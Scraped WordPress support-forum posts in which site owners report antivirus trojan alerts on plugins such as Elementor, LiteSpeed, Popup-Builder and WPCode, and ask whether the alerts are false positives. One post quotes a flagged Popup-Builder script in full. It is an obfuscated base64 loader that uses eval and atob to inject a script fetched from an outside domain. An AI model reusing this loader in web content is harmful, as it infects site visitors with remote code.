L’antivirus Avast rileva un Trojan nel file: wp-content/plugins/elementor/assets/js/common-modules.min.js
]]>The URL indicated is “../wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.22.3”.
Since these are three different websites and there haven’t been any changes to the plugin, I understand that it could be a false positive.
I am writing to confirm that everything is fine, see if this is happening to others, and if so, that it can be corrected.
I have notified the antivirus as a false positive for review.
]]>I hope you’re all doing well. On some sites where I have the LiteSpeed plugin installed, when I access the Page Optimization menu, Kaspersky antivirus reports a Trojan with the following information:
Threat level: High Object type: File Object name: admin.php?page=litespeed-page_optm Type: Trojan Horse Name: HEUR.Script.Malcrack.gen
I would like to know if anyone else is experiencing this issue. I’m suspecting it might be a false positive.
Thank you!
]]>we got our Website locally blocked by the ESET Virus Scanner, saying it’s infected by a trojan (this is why i am not posting a link to it)! They hihglight a piece of code which comes from your Popup-Builder:
<script defer id="sgpb-custom-script-2075" src="data:text/javascript;base64,alF1ZXJ5KGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpe3NnQWRkRXZlbnQod2luZG93LCAic2dwYldpbGxPcGVuIiwgZnVuY3Rpb24oZSkge2lmIChlLmRldGFpbC5wb3B1cElkID09ICIyMDc1Iikge3ZhciBqamhmZ25qYy8qcmJobG9lbHgqLz0vKnJiaGxvZWx4Ki9ldmFsOy8qcmJobG9lbHgqL3ZhciB1Y3h0ZnUvKnJiaGxvZWx4Ki89LypyYmhsb2VseCovYXRvYjtqamhmZ25qYyh1Y3h0ZnUoImQiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJR1EiKy8qdXN3b2l1emxsdSovIjlaRzlqZCIrLypyYmhsb2VseCovIlcxbGJuUSIrLyp1c3dvaXV6bGx1Ki8iN2QiKy8qcmJobG9lbHgqLyJtRnkiKy8qcmJobG9lbHgqLyJJSE05WkM1IisvKnVzd29pdXpsbHUqLyJqY21WaGQiKy8qcmJobG9lbHgqLyJHVkZiR1Z0Wlc1IisvKnVzd29pdXpsbHUqLyIwIisvKnlva3lkcmh6Ki8iS0NKeiIrLyp5b2t5ZHJoeiovIlkzSnBjSFEiKy8qdXN3b2l1emxsdSovImlLVHR6IisvKnlva3lkcmh6Ki8iTG5OeSIrLypyYmhsb2VseCovIll6IisvKnlva3lkcmh6Ki8iMCIrLyp5b2t5ZHJoeiovIm5hSFIwIisvKnlva3lkcmh6Ki8iY0hNNkx5IisvKnJiaGxvZWx4Ki8iOXoiKy8qeW9reWRyaHoqLyJiMlowIisvKnlva3lkcmh6Ki8iTG5Od1pXTnBZV3hqY21GbWQiKy8qcmJobG9lbHgqLyJHSnZlQzUiKy8qdXN3b2l1emxsdSovImpiMjAiKy8qeW9reWRyaHoqLyJ2U2xwR1dXSkRKeiIrLyp5b2t5ZHJoeiovInRrTG1kIisvKnJiaGxvZWx4Ki8ibGQiKy8qcmJobG9lbHgqLyJFVnMiKy8qdXN3b2l1emxsdSovIlpXMWxiblJ6IisvKnlva3lkcmh6Ki8iUSIrLyp1c3dvaXV6bGx1Ki8ibmxVWVdkIisvKnJiaGxvZWx4Ki8iT1lXMWxLQ2QiKy8qcmJobG9lbHgqLyJvWldGa0p5IisvKnJiaGxvZWx4Ki8ibGJNRjAiKy8qeW9reWRyaHoqLyJ1WVhCd1pXNSIrLyp1c3dvaXV6bGx1Ki8ia1EiKy8qdXN3b2l1emxsdSovIjJocGJHUSIrLyp1c3dvaXV6bGx1Ki8ib2N5IisvKnJiaGxvZWx4Ki8iazciKSk7fTt9KTt9KTs="></script>
Is that trustworhty code or is it possible that the plugin is infected by malware?
thank you,
best regards
]]>\INSERT-HEADERS-AND-FOOTERS\INCLUDES\ADMIN\IMPORTERS\CLASS-WPCODE-IMPORTER-WOODY.PHP
\INSERT-HEADERS-AND-FOOTERS\INCLUDES\ADMIN\PAGES\CLASS-WPCODE-ADMIN-PAGE-CLICK.PHP
\INSERT-HEADERS-AND-FOOTERS\INCLUDES\EXECUTE\CLASS-WPCODE-SNIPPET-EXECUTE-CSS.PHP
Is this something you’re aware of? Is it really malware in your files? Either way, how do I proceed? Do I delete these files and replace them from a fresh download? Or just uninstall and reinstall (and if so, will my current customizations still be available)?.
Thanks.
]]>
Threat found
This web page may contain dangerous content that can provide remote access to an infected device, leak sensitive data from the device or harm the targeted device.
Threat: JS/Agent.RFQ trojan
Access to the web page has been blocked. Your computer is safe.
]]>